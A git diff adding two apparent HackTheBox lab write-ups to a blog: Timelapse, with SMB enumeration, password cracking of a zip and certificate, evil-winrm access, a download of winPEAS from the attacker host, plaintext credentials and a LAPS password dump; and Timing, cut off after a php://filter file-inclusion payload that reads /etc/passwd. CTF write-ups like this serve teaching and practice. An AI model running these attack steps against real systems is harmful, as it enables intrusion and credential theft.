+++ b/content/writeup-ctf/writeup-timelapse-htb/img/image-3.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:08fadb67d7fa3dc922d072d10ea28f41463798bda6e94cd7ea3534500508487f +size 21847 diff --git a/content/writeup-ctf/writeup-timelapse-htb/img/image-3.webp b/content/writeup-ctf/writeup-timelapse-htb/img/image-3.webp new file mode 100644 index 0000000..06cdd35 --- /dev/null +++ b/content/writeup-ctf/writeup-timelapse-htb/img/image-3.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:379c3dd549f467e6b96072c79a5b9d2f49f995315a84238ed0d81697d7ac0a72 +size 20040 diff --git a/content/writeup-ctf/writeup-timelapse-htb/img/image-4.png b/content/writeup-ctf/writeup-timelapse-htb/img/image-4.png new file mode 100644 index 0000000..d238385 --- /dev/null +++ b/content/writeup-ctf/writeup-timelapse-htb/img/image-4.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7623584a87870ed139f149528e6c269dd37866cf867b6c42e9009b42253aaca8 +size 46237 diff --git a/content/writeup-ctf/writeup-timelapse-htb/img/image-4.webp b/content/writeup-ctf/writeup-timelapse-htb/img/image-4.webp new file mode 100644 index 0000000..766a97c --- /dev/null +++ b/content/writeup-ctf/writeup-timelapse-htb/img/image-4.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e39ef3841fb2a8b5a84510fb4a8b49e33d73af50185c3d0ffe24e14fd84df479 +size 37598 diff --git a/content/writeup-ctf/writeup-timelapse-htb/img/image-5.png b/content/writeup-ctf/writeup-timelapse-htb/img/image-5.png new file mode 100644 index 0000000..1a77855 --- /dev/null +++ b/content/writeup-ctf/writeup-timelapse-htb/img/image-5.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:25b74453b46c258e6e5f63493d12f4980f294ab79a0618ff5ed1a7febcd3ba7a +size 38147 
diff --git a/content/writeup-ctf/writeup-timelapse-htb/img/image-5.webp b/content/writeup-ctf/writeup-timelapse-htb/img/image-5.webp new file mode 100644 index 0000000..1878ae8 --- /dev/null +++ b/content/writeup-ctf/writeup-timelapse-htb/img/image-5.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1d7031ccae6c8cd1e327ec4e359b7810cb725a082613af311f55119ce11a3bbb +size 37246 diff --git a/content/writeup-ctf/writeup-timelapse-htb/img/image-6.png b/content/writeup-ctf/writeup-timelapse-htb/img/image-6.png new file mode 100644 index 0000000..662a0da --- /dev/null +++ b/content/writeup-ctf/writeup-timelapse-htb/img/image-6.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:792d359151a6cbd48751800e1fcac345d158ba6a2f4637dab8a57b66e6562355 +size 32552 diff --git a/content/writeup-ctf/writeup-timelapse-htb/img/image-6.webp b/content/writeup-ctf/writeup-timelapse-htb/img/image-6.webp new file mode 100644 index 0000000..58a8385 --- /dev/null +++ b/content/writeup-ctf/writeup-timelapse-htb/img/image-6.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d0f088e666efc651948c318e9b8564ba4c31ebf068a0592db4782a0d2bda7162 +size 32166 diff --git a/content/writeup-ctf/writeup-timelapse-htb/img/image-7.png b/content/writeup-ctf/writeup-timelapse-htb/img/image-7.png new file mode 100644 index 0000000..ec0051c --- /dev/null +++ b/content/writeup-ctf/writeup-timelapse-htb/img/image-7.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5418cd7182f072cacb0976b05a8d73ad5316b1043e743b0d4dda5a6b15a4e3ab +size 27057 diff --git a/content/writeup-ctf/writeup-timelapse-htb/img/image-7.webp b/content/writeup-ctf/writeup-timelapse-htb/img/image-7.webp new file mode 100644 index 0000000..5348f65 --- /dev/null +++ b/content/writeup-ctf/writeup-timelapse-htb/img/image-7.webp 
@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:981af77270afdb4a4dac7edcf2a6331acb77d45f7d7c85f13e4d65f9180ecfce +size 23342 diff --git a/content/writeup-ctf/writeup-timelapse-htb/img/image-8.png b/content/writeup-ctf/writeup-timelapse-htb/img/image-8.png new file mode 100644 index 0000000..e2e4c2d --- /dev/null +++ b/content/writeup-ctf/writeup-timelapse-htb/img/image-8.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4c882050046d580402ff79752d2f6e76ab047422296059a951a7ae785c5ac263 +size 15697 diff --git a/content/writeup-ctf/writeup-timelapse-htb/img/image-8.webp b/content/writeup-ctf/writeup-timelapse-htb/img/image-8.webp new file mode 100644 index 0000000..2bf257f --- /dev/null +++ b/content/writeup-ctf/writeup-timelapse-htb/img/image-8.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6978a194afeba668f705f7122f27d0b639470e7234155e90c2f2e3b048b87c31 +size 14688 diff --git a/content/writeup-ctf/writeup-timelapse-htb/index.md b/content/writeup-ctf/writeup-timelapse-htb/index.md new file mode 100644 index 0000000..5a08c8c --- /dev/null +++ b/content/writeup-ctf/writeup-timelapse-htb/index.md 
@@ -0,0 +1,149 @@ +--- +title: "Writeup - Timelapse (HTB)" +date: 2022-04-03 +slug: "writeup-timelapse-htb" +type: "writeup-ctf" +--- + +This is a writeup for the [Timelapse](https://app.hackthebox.com/machines/Timelapse) machine from the HackTheBox site. + +## Enumeration + +First, let's start with a scan of our target with the following command: + + +```bash +nmap -sV -T4 -Pn 10.129.188.205 +``` +Many TCP ports are discovered: + +![](img/image-1.webp) + +- 22/tcp : SSH port (OpenSSH 8.2) +- 80/tcp : HTTP web server (Apache 2.4.41) + +## Exploit + +First I start by listing the SMB shares with the `guest` account: + + +```bash +enum4linux -a -u "guest" -p "" 10.129.188.205 +``` +![](img/image-2.webp) + +The `Shares` folder is available for reading, let's see what we can find in it: + +![](img/image-3.webp) + +We find two folders, in one of the two folders we find the file `winrm_backup.zip`, I download it then I try to unzip it. Problem is that it is protected by a password. Let's try to crack this password with john. To do so, I start by extracting the hash with the following command: + + +```bash +zip2john winrm_backup.zip > hash +``` +Then I launch the dictionary attack with john with the rockyou dictionary: + +![](img/image-4.webp) + +Quickly I find that the password is `supremelagacy`. So now I can unpack the archive. In this archive I find a file with the extension `.pfx`. These files are used by windows to store certificates in `PKCS#12` format. From this file we have the possibility to retrieve the certificate and the private key (cf. [ibm.com](https://www.ibm.com/docs/en/arl/9.7?topic=certification-extracting-certificate-keys-from-pfx-file)). To do so, I use the following commands: + + +```bash +openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out prv.key +openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out cert.crt +``` +Problem: the certificate is also protected by a password. I test the password previously found, but without success. 
Once again we will have to use john to brute force the password. First I get the hash with the following command: + + +```bash +pfx2john legacyy_dev_auth.pfx > hashbis +``` +Then I launch the dictionary attack with john : + +![](img/image-5.webp) + +I find the password `thuglegacy`, I can now extract the private key and the certificate. I then test to connect to the machine with these two files for authentication. For that I use `evil-winrm` with the following command: + + +```bash +evil-winrm -i 10.129.188.205 -S -c cert.crt -k prv.key -p -u +``` +![](img/image-6.webp) + +I now have a shell with the `legacyy` user and I can get the first flag. + + +```bash +*Evil-WinRM* PS C:\Users\legacyy\Desktop> more user.txt +6a29afecacdabd66d286759e1f1379ff +``` +## Privilege escalation + +For the elevation of privilege I start by uploding winPEAS then I execute it : + + +```bash +powershell "Invoke-WebRequest -UseBasicParsing 10.10.14.173/winPEASx64.exe -OutFile winPEASx64.exe" +./winPEASx64.exe +``` +In the result of the program, I find that a file containing a command history exists on the machine: + +![](img/image-7.webp) + +I get it on my machine with the following command: + + +```bash +download C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt +``` + +```bash +whoami +ipconfig /all +netstat -ano |select-string LIST +$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck +$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force +$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p) +invoke-command -computername localhost -credential $c -port 5986 -usessl - +SessionOption $so -scriptblock {whoami} +get-aduser -filter * -properties * +exit +``` +Looking at the contents of the file I find a user and his password! + +Another thing that winPEAS teaches me is that the user svc\_deploy has the right to read the LAPS passwords attribute! 
+ + +> The "Local Administrator Password Solution" (LAPS) provides management of local account passwords of domain joined computers. Passwords are stored in Active Directory (AD) and protected by ACL, so only eligible users can read it or request its reset. + +So I try to do it with the [LAPSDumper](https://github.com/n00py/LAPSDumper/blob/main/laps.py) script with the following command: + + +```bash +┌──(d3vyce㉿kali)-[~/Documents] +└─$ python3 Windows/laps.py -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' -d timelapse.htb +DC01$:J3V}8QBsB4Q6+jgveai$7}}M +``` +The script finds the administrator password of the machine! I can now connect with the following command: + + +```bash +evil-winrm -i 10.129.188.205 -S -u Administrator -p 'J3V}8QBsB4Q6+jgveai$7}}M' +``` +![](img/image-8.webp) + +I now have a shell as Administrator and I can retrieve the last flag. + + +```powershell +*Evil-WinRM* PS C:\Users\TRX\Desktop> cat root.txt +09cec1f63345aa18fcf4bd05b9be6714 +``` +## Recommendations + +To patch this host I think it would be necessary to perform a number of actions: + +- Do not allow SMB shares containing important files to be accessed by unidentified users +- Do not use weak passwords to protect certificates +- Do not leave files with clear passwords diff --git a/content/writeup-ctf/writeup-timing-htb/featured.png b/content/writeup-ctf/writeup-timing-htb/featured.png new file mode 100644 index 0000000..cdb9d1e --- /dev/null +++ b/content/writeup-ctf/writeup-timing-htb/featured.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d5214522a0e948f393873d7f89f8f01ea16402e449ee2b398c88fe21f9e720b6 +size 295158 diff --git a/content/writeup-ctf/writeup-timing-htb/featured.webp b/content/writeup-ctf/writeup-timing-htb/featured.webp new file mode 100644 index 0000000..8adc1c8 --- /dev/null +++ b/content/writeup-ctf/writeup-timing-htb/featured.webp 
@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e79d340fc672ee104f27ee1e6e345a5e503cdc4d22a4241ceb4bb9ded199c631 +size 30224 diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-1.png b/content/writeup-ctf/writeup-timing-htb/img/image-1.png new file mode 100644 index 0000000..9c77084 --- /dev/null +++ b/content/writeup-ctf/writeup-timing-htb/img/image-1.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5a73bcfdce2c626424c8428bb85b3d2598881aaa9bc3ab24009ae5a9e2519259 +size 36941 diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-1.webp b/content/writeup-ctf/writeup-timing-htb/img/image-1.webp new file mode 100644 index 0000000..5cfde10 --- /dev/null +++ b/content/writeup-ctf/writeup-timing-htb/img/image-1.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:11f04dd410ca3ed966926c2c05cdbae1deaedd097a4ca050f465d67537296a05 +size 31878 diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-10.png b/content/writeup-ctf/writeup-timing-htb/img/image-10.png new file mode 100644 index 0000000..cc71754 --- /dev/null +++ b/content/writeup-ctf/writeup-timing-htb/img/image-10.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:04ec28497b45f522d242822d58fd181a01967ba2a6fa2e7b9a7f5773e2924804 +size 12603 diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-10.webp b/content/writeup-ctf/writeup-timing-htb/img/image-10.webp new file mode 100644 index 0000000..632eaa2 --- /dev/null +++ b/content/writeup-ctf/writeup-timing-htb/img/image-10.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:449c6198d69d1566f5a0b853d3cf1eb7a6a32498ed05e4a85a87065de88460db +size 13516 diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-11.png b/content/writeup-ctf/writeup-timing-htb/img/image-11.png new file mode 100644 index 0000000..7e0ff72 --- /dev/null +++ b/content/writeup-ctf/writeup-timing-htb/img/image-11.png 
@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a44e150d690e7642d8f47e0f3e19b9210090ec7883effe2835ccd2efbd6dfe43 +size 14679 diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-11.webp b/content/writeup-ctf/writeup-timing-htb/img/image-11.webp new file mode 100644 index 0000000..9d3aa55 --- /dev/null +++ b/content/writeup-ctf/writeup-timing-htb/img/image-11.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:28510e5978ea711decd2e402e9b61491d5f3d2d82c53b07f7c5c2d1433128613 +size 15110 diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-12.png b/content/writeup-ctf/writeup-timing-htb/img/image-12.png new file mode 100644 index 0000000..6e02d05 --- /dev/null +++ b/content/writeup-ctf/writeup-timing-htb/img/image-12.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:860df4878701a6064ee47746b5af5f2ed77850950aa076144f86270d94f9d9c0 +size 23361 diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-12.webp b/content/writeup-ctf/writeup-timing-htb/img/image-12.webp new file mode 100644 index 0000000..ee63e7c --- /dev/null +++ b/content/writeup-ctf/writeup-timing-htb/img/image-12.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f94581c7acf5dd453be8cb1cdeec15d72918d667fa3a13219f64bf2a2cc20b11 +size 23832 diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-13.png b/content/writeup-ctf/writeup-timing-htb/img/image-13.png new file mode 100644 index 0000000..e47dd28 --- /dev/null +++ b/content/writeup-ctf/writeup-timing-htb/img/image-13.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8f9966e958c81f182b8c9800c97b6bc04a0f646bd7a33ba153d05c23d1c7dcb4 +size 23879 diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-13.webp b/content/writeup-ctf/writeup-timing-htb/img/image-13.webp new file mode 100644 index 0000000..96de4f2 --- /dev/null +++ b/content/writeup-ctf/writeup-timing-htb/img/image-13.webp 
@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5b3c32a8139baf5b0b50e56e9decd398e6d3a1513e5091d0bfdf7467e59736a8 +size 19850 diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-14.png b/content/writeup-ctf/writeup-timing-htb/img/image-14.png new file mode 100644 index 0000000..fbcd453 --- /dev/null +++ b/content/writeup-ctf/writeup-timing-htb/img/image-14.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7efe3dbcb31cb9c2f8ab550ab5549210e0411975305e640dd209c2b8d7b235e4 +size 38836 diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-14.webp b/content/writeup-ctf/writeup-timing-htb/img/image-14.webp new file mode 100644 index 0000000..ac148b2 --- /dev/null +++ b/content/writeup-ctf/writeup-timing-htb/img/image-14.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:163dc82507c3a415523eddf8ba53822c08082abe49d0be0f9bffd1521e8430f8 +size 34388 diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-15.png b/content/writeup-ctf/writeup-timing-htb/img/image-15.png new file mode 100644 index 0000000..bde166a --- /dev/null +++ b/content/writeup-ctf/writeup-timing-htb/img/image-15.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:335c2fadf89b73a80fc29a9e426f43f355f227c795ff2d93eaef9f307fc368f5 +size 59756 diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-15.webp b/content/writeup-ctf/writeup-timing-htb/img/image-15.webp new file mode 100644 index 0000000..bc29497 --- /dev/null +++ b/content/writeup-ctf/writeup-timing-htb/img/image-15.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:dae7ebfe9ae7c481291b01bc8b96fca53b244b537bbb383d42cc8ad16791326c +size 52702 diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-16.png b/content/writeup-ctf/writeup-timing-htb/img/image-16.png new file mode 100644 index 0000000..30e320b --- /dev/null +++ b/content/writeup-ctf/writeup-timing-htb/img/image-16.png 
@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:082d9627a4a4f864eb88a7c2235eea6a6b05e381a6df43b03e946d91b4042a4f +size 14924 diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-16.webp b/content/writeup-ctf/writeup-timing-htb/img/image-16.webp new file mode 100644 index 0000000..580cbd3 --- /dev/null +++ b/content/writeup-ctf/writeup-timing-htb/img/image-16.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2d1ec36813471a1a69450551fb7cf382f141198baf715e02a3a7fde328fa51ad +size 17644 diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-17.png b/content/writeup-ctf/writeup-timing-htb/img/image-17.png new file mode 100644 index 0000000..f2ec880 --- /dev/null +++ b/content/writeup-ctf/writeup-timing-htb/img/image-17.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c907e51f1cef18dd28af4287b6a39b90163d41b8082be034501e0a49ff4cfd6b +size 21008 diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-17.webp b/content/writeup-ctf/writeup-timing-htb/img/image-17.webp new file mode 100644 index 0000000..6aa515b --- /dev/null +++ b/content/writeup-ctf/writeup-timing-htb/img/image-17.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:987bc8f06149ea61fe0dcc500fb95b59043f3483cf8077cd6cdfce024db9452f +size 22906 diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-18.png b/content/writeup-ctf/writeup-timing-htb/img/image-18.png new file mode 100644 index 0000000..c65e75f --- /dev/null +++ b/content/writeup-ctf/writeup-timing-htb/img/image-18.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:44c986583e28e1a780721e48f8d1cc0c1a1e74b0dd5dcf5beec6875c2b7ac798 +size 24291 diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-18.webp b/content/writeup-ctf/writeup-timing-htb/img/image-18.webp new file mode 100644 index 0000000..3aa8f58 --- /dev/null +++ b/content/writeup-ctf/writeup-timing-htb/img/image-18.webp 
@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:76c1a59f02ecae9d24da819e902447f8bc13362baebf545806c3fd09e1ecb0be +size 36094 diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-19.png b/content/writeup-ctf/writeup-timing-htb/img/image-19.png new file mode 100644 index 0000000..1f84c28 --- /dev/null +++ b/content/writeup-ctf/writeup-timing-htb/img/image-19.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a4dd4e370050a0fb224b9b1031283fa1aae007ff82eb791c1f9eb91df12856a1 +size 48350 diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-19.webp b/content/writeup-ctf/writeup-timing-htb/img/image-19.webp new file mode 100644 index 0000000..adc41e3 --- /dev/null +++ b/content/writeup-ctf/writeup-timing-htb/img/image-19.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:71b7f75aca43d539bdee6e38990671d192b81cc647b5374160468b90892234a1 +size 42062 diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-2.png b/content/writeup-ctf/writeup-timing-htb/img/image-2.png new file mode 100644 index 0000000..4395fdf --- /dev/null +++ b/content/writeup-ctf/writeup-timing-htb/img/image-2.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fe335ed79874d2a603bb95fc8cad85abe6b8b899e39c4033e00f874d13735bd4 +size 41386 diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-2.webp b/content/writeup-ctf/writeup-timing-htb/img/image-2.webp new file mode 100644 index 0000000..5c27dd4 --- /dev/null +++ b/content/writeup-ctf/writeup-timing-htb/img/image-2.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6de64fc8cbbd379528f4c0760467b15d1881cc768d512a2f7eb8d1ed97b3d561 +size 10532 diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-20.png b/content/writeup-ctf/writeup-timing-htb/img/image-20.png new file mode 100644 index 0000000..ddedaee --- /dev/null +++ b/content/writeup-ctf/writeup-timing-htb/img/image-20.png 
@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5113f34a0a50554ec236f0edfe17572115c3141bfcdd2396421b146ba17ee79d +size 20198 diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-20.webp b/content/writeup-ctf/writeup-timing-htb/img/image-20.webp new file mode 100644 index 0000000..b271ab2 --- /dev/null +++ b/content/writeup-ctf/writeup-timing-htb/img/image-20.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e2547e7fe4481043d9e61c7e97d26b10167ef1e375e74564d97f6d7d698d414e +size 21110 diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-21.png b/content/writeup-ctf/writeup-timing-htb/img/image-21.png new file mode 100644 index 0000000..f77de4f --- /dev/null +++ b/content/writeup-ctf/writeup-timing-htb/img/image-21.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9be541c5bb6391741e51d205cb2a225e5817469773123925fc58da5bf59db226 +size 54120 diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-21.webp b/content/writeup-ctf/writeup-timing-htb/img/image-21.webp new file mode 100644 index 0000000..99d6a88 --- /dev/null +++ b/content/writeup-ctf/writeup-timing-htb/img/image-21.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a382e45ead08775949d921736a4ed1fc47d5a1921ce72284b16b4c81dbdc4925 +size 49984 diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-3.png b/content/writeup-ctf/writeup-timing-htb/img/image-3.png new file mode 100644 index 0000000..dac4ea9 --- /dev/null +++ b/content/writeup-ctf/writeup-timing-htb/img/image-3.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:809f6a931a1112321e07f72c3bcc9fe49edc452e4027c692fe3fe8ef730fb76e +size 101325 diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-3.webp b/content/writeup-ctf/writeup-timing-htb/img/image-3.webp new file mode 100644 index 0000000..9e922e1 --- /dev/null +++ b/content/writeup-ctf/writeup-timing-htb/img/image-3.webp 
@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2d95726d6bf27a02851764f1b3f5d1fa5441ca35551da9365ef1f127e15afdd7 +size 93320 diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-4.png b/content/writeup-ctf/writeup-timing-htb/img/image-4.png new file mode 100644 index 0000000..16d53ae --- /dev/null +++ b/content/writeup-ctf/writeup-timing-htb/img/image-4.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:66774f6abbd98e6a7b678f306e063ee8dc44dc43f2140bd8df69c6fac9666fb0 +size 43474 diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-4.webp b/content/writeup-ctf/writeup-timing-htb/img/image-4.webp new file mode 100644 index 0000000..cac7fab --- /dev/null +++ b/content/writeup-ctf/writeup-timing-htb/img/image-4.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:53f21af41de8fede54af9dbf632552695e04305f52f86b1878114c8ef17d319b +size 35140 diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-5.png b/content/writeup-ctf/writeup-timing-htb/img/image-5.png new file mode 100644 index 0000000..e209f19 --- /dev/null +++ b/content/writeup-ctf/writeup-timing-htb/img/image-5.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:42b08ccb1d8b64c1a0de213e388c6cc5d51e17b78297fb8154e9f6e5fbbc4fc0 +size 8158 diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-5.webp b/content/writeup-ctf/writeup-timing-htb/img/image-5.webp new file mode 100644 index 0000000..d1bed6f --- /dev/null +++ b/content/writeup-ctf/writeup-timing-htb/img/image-5.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ff3177b0fdc858c855efc183499d0d3af20a016462245a723bffed22d08b60b1 +size 7294 diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-6.png b/content/writeup-ctf/writeup-timing-htb/img/image-6.png new file mode 100644 index 0000000..042a061 --- /dev/null +++ b/content/writeup-ctf/writeup-timing-htb/img/image-6.png 
@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:39f82af1221a5f7036651a6612bd42950f6b5c0912a4af73f3da964e7412fe7d +size 32550 diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-6.webp b/content/writeup-ctf/writeup-timing-htb/img/image-6.webp new file mode 100644 index 0000000..7b30317 --- /dev/null +++ b/content/writeup-ctf/writeup-timing-htb/img/image-6.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d7bca96a323be3797193ab4380fa92a20df129982c9a23f46aef7c8e06739c6d +size 34996 diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-7.png b/content/writeup-ctf/writeup-timing-htb/img/image-7.png new file mode 100644 index 0000000..aef1754 --- /dev/null +++ b/content/writeup-ctf/writeup-timing-htb/img/image-7.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:911e549992d5ab38c8566d70ebfe5efde84de18d372d284f817d1a51020bfaa7 +size 13021 diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-7.webp b/content/writeup-ctf/writeup-timing-htb/img/image-7.webp new file mode 100644 index 0000000..83202ec --- /dev/null +++ b/content/writeup-ctf/writeup-timing-htb/img/image-7.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:babc10f58f506c89d01a3f002110c68b611314095ce427edb32076ad9872a87b +size 18628 diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-8.png b/content/writeup-ctf/writeup-timing-htb/img/image-8.png new file mode 100644 index 0000000..93385da --- /dev/null +++ b/content/writeup-ctf/writeup-timing-htb/img/image-8.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b7361ab102345339fe8c72c759407a6a4f6a09c2f15cfecab9ee68b1b97be48e +size 9986 diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-8.webp b/content/writeup-ctf/writeup-timing-htb/img/image-8.webp new file mode 100644 index 0000000..8042c85 --- /dev/null +++ b/content/writeup-ctf/writeup-timing-htb/img/image-8.webp 
@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d0c43d07d065dac385488c8cb3bfb42a110060f5b74e03b88dc306a80cdd1164 +size 8012 diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-9.png b/content/writeup-ctf/writeup-timing-htb/img/image-9.png new file mode 100644 index 0000000..8bfc754 --- /dev/null +++ b/content/writeup-ctf/writeup-timing-htb/img/image-9.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bfb37da41b615ff14a8382dbf6321cda83c267360a56e8157b7faceedbd5a136 +size 12839 diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-9.webp b/content/writeup-ctf/writeup-timing-htb/img/image-9.webp new file mode 100644 index 0000000..8203558 --- /dev/null +++ b/content/writeup-ctf/writeup-timing-htb/img/image-9.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ec998496430dda523329b2f599bf5d9c192137f5697edaa03bbb04f9868e3cb7 +size 21126 diff --git a/content/writeup-ctf/writeup-timing-htb/index.md b/content/writeup-ctf/writeup-timing-htb/index.md new file mode 100644 index 0000000..4c9647f --- /dev/null +++ b/content/writeup-ctf/writeup-timing-htb/index.md 
@@ -0,0 +1,300 @@ +--- +title: "Writeup - Timing (HTB)" +date: 2022-04-07 +slug: "writeup-timing-htb" +type: "writeup-ctf" +--- + +This is a writeup for the [Timing](https://app.hackthebox.com/machines/Timing) machine from the HackTheBox site. + +## Enumeration + +First, let's start with a scan of our target with the following command: + + +```bash +nmap -sV -T4 -Pn 10.10.11.135 +``` +Two TCP ports are discovered: + +![](img/image-1.webp) + +- 22/tcp : SSH port (OpenSSH 7.6p1) +- 80/tcp : HTTP web server (Apache 2.4.49) + +![](img/image-2.webp) + +## Exploit + +First of all, let's start by listing the pages of the website. + +![](img/image-3.webp) + +When testing the different ones, they all return an error except the `image.php` page. Let's try to list the arguments available on this page with the following command: + + +```bash +ffuf -c -u http://10.10.11.135/image.php?FUZZ=/bin/bash -w wordlist/common.txt -fw 1 +``` +![](img/image-4.webp) + +We find that the `img` argument exists. Let's try to list the contents of the `/etc/passwd` : + +![](img/image-5.webp) + +The site has an injection detection, let's try to make a new request but this time with a base64 encoding to avoid the detection: + + +```bash +http://10.10.11.135/image.php?img=php://filter/convert.base64-encode/resource=/etc/passwd +``` +The page returns a character string in base64, I decode it with the following command: + + +```bash +┌──(d3vyce㉿kali)-[~/Documents] +└─$ echo "[string]" | base64 -d +root:x:0:0:root:/root:/bin/bash 